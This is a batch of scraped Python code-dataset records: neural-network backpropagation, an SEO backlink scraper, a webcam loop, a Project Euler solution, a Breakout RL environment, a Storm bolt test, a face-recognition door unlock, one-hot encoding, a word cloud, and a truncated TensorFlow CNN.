∂E/∂o = 1/n(o - t)\n error_deriv_output = (outputs[-1] - np.array(targets).T) / len(inputs)\n output_deriv_int_output = self.activation_function_prime(intermediate_outputs[-1])\n error_deriv_int_output = error_deriv_output * output_deriv_int_output\n weight_gradients = [np.dot(error_deriv_int_output, outputs[-2].T)]\n bias_gradients = [error_deriv_int_output]\n for i in range(2, len(outputs)):\n # Derivative of the error w.r.t. the output of the ith layer:\n # ∂E/∂o^i = ∂E/∂(o_int)^(i + 1) * ∂(o_int)^(i + 1)/∂o^i\n error_deriv_output = np.dot(self.weights[-i + 1].T, error_deriv_int_output)\n # ∂o^i/∂(o_int)^i\n output_deriv_int_output = self.activation_function_prime(intermediate_outputs[-i])\n # ∂E/∂(o_int)^i = ∂E/∂o^i * ∂o^i/∂(o_int)^i\n error_deriv_int_output = error_deriv_output * output_deriv_int_output\n # Derivative of the error w.r.t. the weights of the ith layer: ∂E/∂w^i = ∂E/∂(o_int)^i * ∂(o_int)^i/∂w^i\n weight_gradients.append(np.dot(error_deriv_int_output, outputs[-i - 1].T))\n # Deriv. of error w.r.t. biases of ith layer: ∂E/∂b^i = ∂E/∂(o_int)^i * ∂(o_int)^i/∂b^i = ∂E/(∂o_int)^i\n bias_gradients.append(error_deriv_int_output)\n\n return np.array(weight_gradients[::-1]), np.array(bias_gradients[::-1])\n\n # Creates a numpy array containing weights for each layer of the neural network\n def create_weights(self):\n weights = []\n for i in range(1, len(self.layer_sizes)):\n layer_weights = []\n for neuron in range(self.layer_sizes[i]):\n neuron_weights = [np.random.normal(0) for j in range(self.layer_sizes[i - 1])]\n layer_weights.append(neuron_weights)\n weights.append(np.array(layer_weights))\n return np.array(weights)\n\n # Creates a numpy array containing biases for each layer of the network\n def create_biases(self):\n biases = []\n for layer in self.layer_sizes[1:]:\n bias = [np.random.normal(0) for i in range(layer)]\n biases.append(bias)\n return np.array(biases)\n\n @staticmethod\n # Sigmoid function\n def sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n @staticmethod\n # The derivative of the sigmoid function\n def sigmoid_prime(x):\n return np.exp(-x) / (1 + np.exp(-x)) ** 2\n\n @staticmethod\n # Rectified Linear Unit (ReLU) function\n def relu(x):\n return np.greater(x, 0) * x\n\n @staticmethod\n # The derivative of the Rectified Linear Unit (ReLU) function\n def relu_prime(x):\n return np.greater_equal(x, 0)\n","sub_path":"NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143876168","text":"import pandas as pd\nfrom pandas import ExcelWriter\nfrom pandas import ExcelFile\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nexcel = '' #enter the excel file name\ndf = pd.read_excel(excel, sheet_name='Sheet1')\nclient_domains = [] #enter client names\nsponsored_articles = []\n\nclass SponsoredArticle:\n def __init__(self, url, date):\n self.url = url\n self.date = date\n self.link_targets = []\n self.link_coeff = 0;\n\n def get_client_backlinks(self):\n html = requests.get(self.url).text\n soup = BeautifulSoup(html, 'html.parser')\n links = [x for x in soup.find_all('a') if x.get('href')]\n for link in links:\n if any(c in link.get('href') for c in client_domains):\n link_target = LinkTarget(link)\n link_target.update_link_status()\n self.link_targets.append(link_target)\n\n def calculate_coeff(self):\n if (len(self.link_targets)) != 0:\n self.link_coeff = 1 / (len(self.link_targets))\n\n\nclass LinkTarget:\n def __init__(self, link):\n self.link = link\n self.link_target = link.get('href')\n self.follow_status = ''\n self.anchor = link.text\n\n def update_link_status(self):\n if not self.link.get('rel') or 'nofollow' not in self.link.get('rel'):\n self.follow_status = 'DOfollow'\n elif 'nofollow' in self.link.get('rel'):\n self.follow_status = 'NOfollow'\n\ndef get_data_by_client_domain(client_domain): # filter excel data by a specific client\n return df[df['Linkziel'].str.contains(client_domain)] # careful between german and english\n\ndef get_sponsored_articles(filtered_df): # iterate on the dataframe filtered by client_domain\n i = 0 # and append the sponsored_articles\n while i < len(filtered_df) :\n article_url = filtered_df.iloc[i][0]\n article_date = filtered_df.iloc[i][3]\n sponsored_article = SponsoredArticle(article_url, article_date)\n sponsored_articles.append(sponsored_article)\n i += 1\n\n\ndef append_link_to_dic(sponsored_article):\n for link_target in sponsored_article.link_targets:\n final_df['Link origin'].append(sponsored_article.url)\n final_df['Date'].append(sponsored_article.date)\n final_df['Link target'].append(link_target.link_target)\n final_df['Link follow status'].append(link_target.follow_status)\n final_df['Link coeff'].append(sponsored_article.link_coeff)\n final_df['Anchor'].append(link_target.anchor)\n\ndef export_to_excel(dic, client_domains):\n excel_file_name = ''\n i = 0\n while i < len(client_domains): # just concatenate the names of the clients\n if i < len(client_domains) - 1: # for the excel file name\n excel_file_name += client_domains[i] + '_'\n else:\n excel_file_name += client_domains[i]\n i += 1\n\n # export to excel file\n dic = pd.DataFrame(dic)\n writer = pd.ExcelWriter(\"CRAWLED_\" + excel_file_name + \".xlsx\")\n dic.to_excel(writer, sheet_name='RAW')\n writer.save()\n\n\nif __name__ == '__main__':\n # iterate on client_domains and create sponsored_articles objects\n for client_domain in client_domains:\n get_sponsored_articles(\n get_data_by_client_domain(client_domain))\n for sponsored_article in sponsored_articles:\n sponsored_article.get_client_backlinks()\n sponsored_article.calculate_coeff()\n\n # write in excel\n final_df = {'Link origin': [], 'Date':[], 'Link target': [], 'Link follow status': [], 'Link coeff':[], 'Anchor': [] }\n for sponsored_article in sponsored_articles:\n append_link_to_dic(sponsored_article)\n export_to_excel(final_df, client_domains)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"242006613","text":"import numpy as np \nimport cv2\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 640) # set width\ncap.set(4, 480) # set height\n\nwhile (True):\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\n cv2.imshow('frame', frame)\n # cv2.imshow('gray', gray)\n\n k = cv2.waitKey(30) & 0xff\n if k == 27: # press ctrl+c to quit\n break\n\ncap.release()\nc\ncv2.destroyAllWindows()\n","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427067303","text":"\"题目\"\r\n\"请编写一个方法,将字符串中的空格全部替换为“%20”。假定该字符串有足够的空间存放新增的字符,并且知道字符串的真实长度(小于等于1000),同时保证字符串由大小写的英文字母组成。\"\r\n\"测试用例\"\r\n\"Mr John Smith ,返回 Mr%20John%20Smith\"\r\n\r\n\"利用python replace函数\"\r\ndef tihuan(s):\r\n s=s.replace(\" \",\"%20\")\r\n return s\r\n\r\ns=\"Mr John Smith\"\r\nresult=tihuan(s)\r\nprint(result)\r\n\r\n\r\n\"遍历法\"\r\ndef tihuan1(s):\r\n ss=\"\"\r\n for i in range(len(s)):\r\n if s[i]==\" \":\r\n ss=ss+\"%20\"\r\n else:\r\n ss=ss+s[i]\r\n return ss\r\n\r\nresult2=tihuan1(s)\r\nprint(result2)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"字符串—空格替换.py","file_name":"字符串—空格替换.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313845057","text":"sum_of_squares = sum(i ** 2 for i in range(1, 101))\r\n# print(sum_of_squares)\r\n\r\nsquare_of_sums = sum(i for i in range(1, 101)) ** 2\r\n# print(square_of_sums)\r\n\r\ndifference = square_of_sums - sum_of_squares\r\n# print(difference)\r\n# ahhh so, so close to perfect!\r\n# oh hi!\r\n# hey :)\r\n\r\n# :)\r\n# where's the mistake?\r\n# line 1\r\n\r\n# oh lol okay, im thinking!\r\n# so close though\r\n# i'm just gonna tell you because it's subtle\r\n# change from a list comp to a generating expression\r\n# nope\r\n# very nope\r\n# uh oh!!\r\n# what's the point in making a list?\r\n# all you care about is the sum\r\n# you just needed to change what line 1 used to be\r\n# (line 206 of comprehensions)\r\n\r\n# ah oh yeah the same thing again i keep on making lists!\r\n# done?\r\n# cool!\r\n# some pointless brackets in line 4 but otherwise good :)\r\n# :)\r\n# good work :)\r\n# was a very easy one to be fair, but :)\r\n\r\ndef slow(n):\r\n sum_of_squares = sum(i**2 for i in range(n+1))\r\n square_of_sums = sum(range(n+1))**2\r\n return square_of_sums - sum_of_squares\r\n\r\n# print(question6(100))\r\n\r\n# nice!\r\n# wasn't expecting line 39 to work tbh\r\n# but just realised - this solution isn't perfect!\r\n# can you think of a better maths way of doing this? :)\r\n# like I can't fault your implementation of the algorithm\r\n# but is there a better algorithm\r\n\r\n# yeah i think there is, let me try and write it!\r\n# good girl :)\r\n\r\ndef fast(n):\r\n sum_of_squares = (n * (n + 1) * (2 * n + 1)) // 6\r\n square_of_sums = ((n * (n + 1)) // 2) ** 2\r\n return square_of_sums - sum_of_squares\r\n\r\n# print(question6_2(100))\r\n\r\n# done!\r\n\r\nimport time\r\nprint(' | '.join(['{:^20}', '{:^15}', '{:^15}']).format('n', 'slow', 'fast'))\r\nprint('+'.join(['-'*21, '-'*17, '-'*16]))\r\n\r\nfor k in range(9):\r\n n = 10**k\r\n print('{:>20}'.format(n), end='', flush=True)\r\n\r\n for function in [slow, fast]:\r\n print(' | ', end='', flush=True)\r\n start = time.time()\r\n function(n)\r\n duration = time.time() - start\r\n print(\"{:15.5f}\".format(duration), end='', flush=True)\r\n print()\r\n\r\n# on my machine, k=10 would take an hour\r\n# ooh woah i just saw this! so cool the way you've formatted it\r\n# lol lets not to k = 10 then!\r\n\r\n# yeah! wanted to demonstrate the time difference between the two methods\r\nprint()\r\nprint(' | '.join(['{:^20}', '{:^15}']).format('n', 'fast'))\r\nprint('+'.join(['-'*21, '-'*17]))\r\n\r\nfor p in range(10):\r\n k = 10**p\r\n n = 2**k\r\n\r\n print('{:>20} | '.format('2^'+str(k)), end='', flush=True)\r\n start = time.time()\r\n function(n)\r\n duration = time.time() - start\r\n print(\"{:15.5f}\".format(duration), end='', flush=True)\r\n print()\r\n","sub_path":"Euler/q006.py","file_name":"q006.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"612684367","text":"import gym\nimport cv2\nfrom multiprocessing import Process, Pipe\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Environment(Process):\n def __init__(self, is_render, env_idx, child_conn):\n super(Environment, self).__init__()\n self.is_render = is_render\n self.env_idx = env_idx\n self.child_conn = child_conn\n self.steps = 0\n self.episode = 0\n self.score = 0\n self.history = np.zeros([84, 84, 4])\n self.env = gym.make('BreakoutDeterministic-v4')\n self.reset()\n self.lives = self.env.env.ale.lives()\n\n def run(self):\n super(Environment, self).run()\n while True:\n action = self.child_conn.recv()\n if self.is_render == True:\n self.env.render()\n\n _, reward, done, info = self.env.step(action + 1)\n\n if self.lives > info['ale.lives'] and info['ale.lives'] > 0:\n force_done = True\n self.lives = info['ale.lives']\n else:\n force_done = done\n\n if force_done:\n reward = -1\n\n if force_done:\n self.env.step(1)\n\n self.score += reward\n self.history[:, :, :3] = self.history[:, :, 1:]\n self.history[:, :, 3] = self.pre_proc(\n self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))\n\n if done:\n self.history = self.reset()\n\n self.child_conn.send([self.history[:, :, :], reward, force_done, done])\n\n def reset(self):\n self.episode += 1\n self.env.reset()\n self.lives = self.env.env.ale.lives()\n self.get_init_state(self.env.env.ale.getScreenGrayscale().squeeze().astype('float32'))\n return self.history[:, :, :]\n\n def pre_proc(self, x):\n x = cv2.resize(x, (84, 84))\n x *= (1.0 / 255.0)\n return x\n\n\n def get_init_state(self, s):\n for i in range(4):\n self.history[:, :, i] = self.pre_proc(s)","sub_path":"breakout_environment.py","file_name":"breakout_environment.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"124133624","text":"# -*- coding: utf-8 -*-\n# Interpreter 133.133.30.99 python 3.0.1\n\n\"\"\"\n提取轨迹,\n\"\"\"\n\nfrom limiao.uic.common.file_util import get_file_list\n\n\ndef extract():\n file_list = get_file_list(\"H:\\\\UCAS\\MPCG\\Source\\data\\Bus\\Bus-201508\\\\trip_complete\", [])\n file_out = open(\"E:\\\\Files\\\\UCAS\\MPCG\\experiment\\\\uic\\odt.txt\", \"w\", encoding=\"UTF-8\")\n for f in file_list:\n odts = []\n print(f)\n with open(f, encoding=\"UTF-8\") as fileObject:\n for line in fileObject.readlines():\n t = line.split(\"\\t\")\n odts.append(\"\\t\".join(t[0:11]).strip(\"\\n\") + \"\\n\")\n file_out.writelines(odts)\n file_out.close()\n\n\nif __name__ == \"__main__\":\n a = [1]\n b = [2]\n print(a+b)\n\n","sub_path":"limiao/uic/extraction/extract_trajectory.py","file_name":"extract_trajectory.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430892629","text":"from __future__ import print_function, absolute_import\nimport subprocess\nimport unittest\nimport os\nimport sys\nimport time\n\nfrom test.ipc.util import ShellProcess\n\n\n_ROOT = os.path.dirname(os.path.realpath(__file__))\ndef here(*x):\n return os.path.join(_ROOT, *x)\n\n\nclass BasicBoltTester(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n args = [\"python\", here(\"dummy_basic_bolt.py\")]\n cls.proc = subprocess.Popen(args, stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n print(\"Waiting for subprocess to start...\")\n time.sleep(1) # time for the subprocess to start\n if cls.proc.poll() is not None:\n raise Exception(\"Could not create subprocess.\\n{}\"\n .format(\"\".join(cls.proc.stderr.readlines())))\n cls.shell_proc = ShellProcess(cls.proc.stdout, cls.proc.stdin)\n\n def test_1_initial_handshake(self):\n msg = {\n \"conf\": {},\n \"context\": {},\n \"pidDir\": here()\n }\n BasicBoltTester.shell_proc.write_message(msg)\n res = BasicBoltTester.shell_proc.read_message()\n\n self.assertIsInstance(res, dict)\n self.assertEqual(res.get(\"pid\"), BasicBoltTester.proc.pid)\n pid = str(res[\"pid\"])\n self.assertTrue(os.path.exists(here(pid)))\n self.assertTrue(os.path.isfile(here(pid)))\n\n def test_2_auto_ack(self):\n msg = {\n \"id\": \"noop\",\n \"comp\": \"word-spout\",\n \"stream\": \"default\",\n \"task\": 0,\n \"tuple\": [\"snow white and the seven dwarfs\", \"field2\", 3, 4.252]\n }\n BasicBoltTester.shell_proc.write_message(msg)\n res = BasicBoltTester.shell_proc.read_message()\n self.assertEqual(res, {\"command\": \"ack\", \"id\": msg[\"id\"]})\n\n def test_3_auto_anchor(self):\n msg = {\n \"id\": \"emit\",\n \"comp\": \"word-spout\",\n \"stream\": \"default\",\n \"task\": 0,\n \"tuple\": [\"snow white and the seven dwarfs\", \"field2\", 3, 4.252]\n }\n\n BasicBoltTester.shell_proc.write_message(msg)\n res = BasicBoltTester.shell_proc.read_message()\n self.assertEqual(res.get(\"command\"), \"emit\")\n self.assertEqual(msg[\"tuple\"], res.get(\"tuple\"))\n self.assertEqual([msg[\"id\"],], res.get(\"anchors\"))\n\n\n @classmethod\n def tearDownClass(cls):\n os.remove(here(str(cls.proc.pid)))\n cls.proc.kill()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/ipc/test_basic_bolt.py","file_name":"test_basic_bolt.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333475209","text":"#!/usr/bin/env python3\n\n__author__ = \"Mads Ludvig Timm Fagerlund\"\n__credits__ = [\"Mads Ludvig Timm Fagerlund\", \"Benjamin Fyrstenborg Stigsen\", \"Jacob Inberg Østergaard\", \"Oliver Holmgaard\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Mads Ludvig Timm Fagerlund\"\n__email__ = \"mf@kifaplast.dk\"\n__status__ = \"Development\"\n\n# Import modules\nimport face_recognition\nimport numpy\nimport picamera\nimport RPi.GPIO as GPIO\nimport multiprocessing\nimport signal\nfrom os import listdir\nfrom sys import exit\nfrom time import sleep\n\n# Folder directories\ndirectory_array = [\"known_faces/\", \"known_admin_faces/\"]\n\n# GPIO pin and delay setup\nrelay_gpio_pin = 4\nrelay_switch_delay = 0.5\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(relay_gpio_pin, GPIO.OUT)\n\n# Learned name, privilege and encoding for learned persons\nidentities = []\n\n# Variables for camera\ncamera = picamera.PiCamera()\ncamera.resolution = (960, 720)\noutput = numpy.empty((720, 960, 3), dtype=numpy.uint8)\n\n# Prints message, cleans GPIO pins and exits program\ndef signalHandler(sig, frame):\n GPIO.cleanup()\n print(\"\\nGPIO pins has been cleaned. Quitting..\")\n exit(0)\n\n# Make ctrl-z and ctrl-c trigger signalHandler function\nsignal.signal(signal.SIGTSTP, signalHandler)\nsignal.signal(signal.SIGINT, signalHandler)\n\ndef extractEncodings():\n encodings = []\n\n for identity in identities:\n encodings.append(identity[3])\n\n return(encodings)\n\n# Learns face names and encodings for pictures in known directories\ndef learnFaces(privilege):\n\n directory = directory_array[privilege]\n\n # Inform user of script beginning to recognize faces with given privilege\n print(f\"Learning to recognize privilege {privilege} faces...\")\n # Variable for counting face encodings encoded\n count = 0\n\n # Loop for all files in specified directory\n for file in listdir(directory):\n\n # If the file ends with .jpg then run:\n if file.endswith(\".jpg\"):\n\n # Remove file extension from string\n name = str(file[:-4])\n\n # Add filename to directory to get path for file\n file_directory = directory + file\n\n # Create face encoding for face in image\n encoding = face_recognition.face_encodings(face_recognition.load_image_file(file_directory))[0]\n\n # If encoding did not return anything then:\n if len(encoding) == 0:\n\n # Print tbat face was not found in file\n print(f\"Face was not found in image: {file_directory}\")\n \n # If encoding did return an encoding then:\n else:\n\n # Add 1 to count variable\n count += 1\n\n # Append the face name, given privilege and encoding to the identities array\n identities.append([name, privilege, encoding])\n\n # Print name of person which has been learned to recognize and with which privilege\n print(f\"Learned to recognize {name} as face with privilege {privilege}\")\n\n # Print how many faces was learned and recognized and with which privilege\n print(f\"Learned and encoded {count} faces with privilege {privilege}\")\n\n# Checks for faces in frame and compares to known faces\ndef frameCheck(output_camera):\n # Locate faces in current frame\n frame_face_locations = face_recognition.face_locations(output_camera)\n\n print(f\"{len(frame_face_locations)} faces found in frame\")\n\n if len(frame_face_locations) > 0:\n\n print(\"Encoding face(s)...\")\n\n # Encode face encodings from face locations and image\n frame_face_encodings = face_recognition.face_encodings(output_camera, frame_face_locations)\n\n print(\"Encoded face(s)\")\n\n # Loop over each face encodings found in current frame\n for face_encoding in frame_face_encodings:\n\n # Compare face encodings for current frame with the learned face encodings\n matches = face_recognition.compare_faces(extractEncodings(), face_encoding)\n\n # If only one True value is found in compare array\n if matches.count(True) == 1:\n \n # Let name index be the index of the position of True in array\n name_index = matches.index(True)\n\n # If the recognized face is privilege 1\n if (identities[name_index][1] == 1):\n\n # Greet user and unlock door\n print(f\"Welcome {identities[name_index][0]}, Unlocking door\")\n GPIO.output(relay_gpio_pin, 1)\n sleep(relay_switch_delay)\n GPIO.output(relay_gpio_pin, 0)\n\n # If the recognized face is privilege 0\n elif (identities[best_match_index][1] == 0):\n\n # Greet user\n print(f\"Hello {identities[best_match_index][0]}\")\n\n # If no matches was found\n elif matches.count(True) == 0:\n\n print(\"You are not recognized in the database\")\n\n # If more than 1 encoding matched current encoding\n elif matches.count(True) > 1:\n\n print(\"Reading discard. More than one person recognized per face\")\n\n# Define multiprocessing pool\npool = multiprocessing.Pool(processes=multiprocessing.cpu_count())\n\nlearnFaces(0)\nlearnFaces(1)\n\nwhile True:\n # Print dot for every frame captured with camera\n print(\".\")\n\n # Capture frame from camera and assign to output\n camera.capture(output, format=\"rgb\")\n \n # Map frameCheck, with output as argument, to pool\n pool.apply_async(frameCheck, args=(output,))","sub_path":"src/facerec.py","file_name":"facerec.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"95930776","text":"#-*- coding:utf-8 _*- \n\"\"\" \n@author:Administrator\n@file: test_one_hot_encoding.py\n@time: 2018/7/23\n\"\"\"\nimport pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\nimport numpy as np\n\ndata= pd.read_csv('month_4_1.csv',header=0)\n# column = data['column']\n# column_list =set(column)\n# print(column_list)\n\n# column_dict = {}\n# for index,value in enumerate(column_list):\n# column_dict[value] = index\n# print(column_dict)\n# \n# column_new = []\n# for i in column:\n# column_new.append(column_dict[i])\n# # print(len(column_new))\n# # print(column_new)\n# # print(column_new)\n# column_new =np.array( pd.Series(column_new)).reshape(-1,1)\n# enc = OneHotEncoder()\n# column_enc = enc.fit_transform(column_new)\n# column_env_array = column_enc.toarray()\n# # print(column_enc.toarray().shape)\n# column_dataframe = pd.DataFrame(column_env_array,columns=[col for col in column_dict.keys()])\n# data_merge = pd.concat((data,column_dataframe),axis=1)\n# print(data_merge)\n# # print(len(column))\n# # print(column)\n\ndef one_hot_encode_column(dataframe,column_name):\n # data = pd.read_csv('month_4_1.csv', header=0)\n # 获取需要进行one_hot 编码的列\n column = data[column_name]\n # 获取当前列的类别,直接用set就可以得到;\n column_set = set(column)\n print(len(column_set))\n # 将字符转化成标签并存入字典中\n column_dict = {}\n for index, value in enumerate(column_set):\n column_dict[value] = index\n # 开始转化成数字\n column_new = []\n for i in column:\n column_new.append(column_dict[i])\n column_new = np.array(pd.Series(column_new)).reshape(-1, 1)\n # 进行编码\n enc = OneHotEncoder()\n column_enc = enc.fit_transform(column_new)\n column_env_array = column_enc.toarray()\n # 合并成一个数据\n column_dataframe = pd.DataFrame(column_env_array, columns=[col for col in column_dict.keys()])\n data_merge = pd.concat((data, column_dataframe), axis=1)\n # 去掉转化过后的列:\n data_merge = data_merge.drop(columns=column_name)\n return data_merge\n\n\n# new_data = one_hot_encode_column(data,'province')\n# print(data.shape)\n# print(new_data.shape)\n# new_data1 = one_hot_encode_column(new_data,'city')\n# print(new_data1.shape)\n# print(new_data1)\n\n\n# def process_all_data(dataframe):\n# columns = dataframe.columns\n# new_data = dataframe\n# for i in columns:\n# if new_data[i].dtype == 'object':\n# new_data_middle =one_hot_encode_column(new_data,i)\n# new_data = new_data_middle\n# return new_data\n\n#\n# new_data_final = process_all_data(data)\n# print(new_data_final.shape)\n\n# columns = data.columns\n# new_data = data\n# for i in columns:\n# if data[i].dtype == 'object':\n# new_data_middle = one_hot_encode_column(new_data,i)\n# new_data = new_data_middle\n#\n# print(new_data.shape)\n\n\n# 对所有的字符列进行one_hot 编码:\n","sub_path":"use_CNN_to_predict/test_one_hot_encoding.py","file_name":"test_one_hot_encoding.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"452074000","text":"# 用来做词云\nimport wordcloud\n# 用来做词云形状图片\nimport imageio\n# 用来做List向字符串的转换\nimport jieba\n\n# 设置词云的形状背景以待选择\nmk_1 = imageio.imread(\"dollar.png\")\nmk_2 = imageio.imread(\"money.png\")\nmk_3 = imageio.imread(\"robot.png\")\nmk_4 = imageio.imread(\"chinamap.png\")\n\n\n# 将已经处理好的List作为参数传入即可\ndef make_word_cloud(textlist):\n # 选择词云背景\n a = choosing_background()\n # 创建词云对象\n w = create_one(mk=a)\n # 将传入List变成字符串\n string = \" \".join(textlist)\n # 将词云对象和文本信息结合\n w.generate(string)\n saving(w)\n print(\"词云生成成功!\")\n\n\n# 选择词云背景,这里只挑了mk_1和mk_3,后续还可以再调\ndef choosing_background():\n print(\"请告诉我你要设置怎样的词云背景。\\n\")\n print(\"1或者2是金融类,3科技,4中国地图\")\n # 如果没有这一行代码,会出现“local variable 'mk'referenced before assignment”的问题,所以先随便赋一个值\n mk = imageio.imread(\"dollar.png\")\n loop = 1\n while loop == 1:\n option = input(\"你的选择是:\")\n if option == 1:\n mk = mk_1\n break\n elif option == 2:\n mk = mk_2\n break\n elif option == 3:\n mk = mk_3\n elif option == 4:\n mk = mk_4\n else:\n pass\n break\n return mk\n\n\n# 创建一个词云对象,将设置好的词云背景作为参数传入\ndef create_one(mk):\n w = wordcloud.WordCloud(width=1000,\n height=700,\n background_color='white',\n font_path='msyh.ttc',\n scale=15,\n mask=mk,\n )\n return w\n\n\n# 保存为图片,在输出图片的时候需要设置名称\ndef saving(w):\n name = input(\"请告诉我这个词云叫什么:\")\n picture_name = \"{x}.png\".format(x=name)\n w.to_file(picture_name)\n\n\nif __name__ == '__main__':\n # 预设了一个列表,可以试着运行一下,能生成词云,不过列表太小了,没什么实际效果就是了\n str = ['动力学', '和', '电磁学']\n make_word_cloud(textlist=str)\n","sub_path":"Word_cloud/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"493061608","text":"import tensorflow as tf\nimport numpy as np\nimport sys, os,cv2\nfrom sklearn.utils import shuffle\nfrom scipy.misc import imread,imresize\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import OneHotEncoder\nfrom skimage.transform import resize\nfrom imgaug import augmenters as iaa\nimport imgaug as ia\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage.color import rgba2rgb,rgb2gray\n\nold_v = tf.logging.get_verbosity()\ntf.logging.set_verbosity(tf.logging.ERROR)\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nplt.style.use('seaborn-white')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nnp.random.seed(6278)\ntf.set_random_seed(6728)\nia.seed(6278)\n\n# ======= Activation Function ==========\ndef tf_elu(x): return tf.nn.elu(x)\ndef d_tf_elu(x): return tf.cast(tf.greater(x,0),tf.float32) + (tf_elu(tf.cast(tf.less_equal(x,0),tf.float32) * x) + 1.0)\n\ndef tf_tanh(x): return tf.nn.tanh(x)\ndef d_tf_tanh(x): return 1 - tf_tanh(x) ** 2\n\ndef tf_sigmoid(x): return tf.nn.sigmoid(x) \ndef d_tf_sigmoid(x): return tf_sigmoid(x) * (1.0-tf_sigmoid(x))\n\ndef tf_atan(x): return tf.atan(x)\ndef d_tf_atan(x): return 1.0/(1.0 + x**2)\n\ndef tf_iden(x): return x\ndef d_tf_iden(x): return 1.0\n\ndef tf_softmax(x): return tf.nn.softmax(x)\n# ======= Activation Function ==========\n\n# ====== miscellaneous =====\n# code from: https://github.com/tensorflow/tensorflow/issues/8246\ndef tf_repeat(tensor, repeats):\n \"\"\"\n Args:\n\n input: A Tensor. 1-D or higher.\n repeats: A list. Number of repeat for each dimension, length must be the same as the number of dimensions in input\n\n Returns:\n \n A Tensor. Has the same type as input. Has the shape of tensor.shape * repeats\n \"\"\"\n expanded_tensor = tf.expand_dims(tensor, -1)\n multiples = [1] + repeats\n tiled_tensor = tf.tile(expanded_tensor, multiples = multiples)\n repeated_tesnor = tf.reshape(tiled_tensor, tf.shape(tensor) * repeats)\n return repeated_tesnor\n\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n# ====== miscellaneous =====\n\n# ================= VIZ =================\n# Def: Simple funciton to view the histogram of weights\ndef show_hist_of_weigt(all_weight_list,status='before'):\n fig = plt.figure()\n weight_index = 0\n\n for i in range(1,1+int(len(all_weight_list)//3)):\n ax = fig.add_subplot(1,4,i)\n ax.grid(False)\n temp_weight_list = all_weight_list[weight_index:weight_index+3]\n for temp_index in range(len(temp_weight_list)):\n current_flat = temp_weight_list[temp_index].flatten()\n ax.hist(current_flat,histtype='step',bins='auto',label=str(temp_index+weight_index))\n ax.legend()\n ax.set_title('From Layer : '+str(weight_index+1)+' to '+str(weight_index+3))\n weight_index = weight_index + 3\n plt.savefig('viz/weights_'+str(status)+\"_training.png\")\n plt.close('all')\n\n# Def: Simple function to show 9 image with different channels\ndef show_9_images(image,layer_num,image_num,channel_increase=3,alpha=None,gt=None,predict=None):\n image = (image-image.min())/(image.max()-image.min())\n fig = plt.figure()\n color_channel = 0\n limit = 10\n if alpha: limit = len(gt)\n for i in range(1,limit):\n ax = fig.add_subplot(3,3,i)\n ax.grid(False)\n ax.set_xticks([])\n ax.set_yticks([])\n if alpha:\n ax.set_title(\"GT: \"+str(gt[i-1])+\" Predict: \"+str(predict[i-1]))\n else:\n ax.set_title(\"Channel : \" + str(color_channel) + \" : \" + str(color_channel+channel_increase-1))\n ax.imshow(np.squeeze(image[:,:,color_channel:color_channel+channel_increase]))\n color_channel = color_channel + channel_increase\n \n if alpha:\n plt.savefig('viz/z_'+str(alpha) + \"_alpha_image.png\")\n else:\n plt.savefig('viz/'+str(layer_num) + \"_layer_\"+str(image_num)+\"_image.png\")\n plt.close('all')\n# ================= VIZ =================\n\n# ================= LAYER CLASSES =================\nclass CNN():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return self.w\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n self.layer = tf.nn.conv2d(input,self.w,strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def 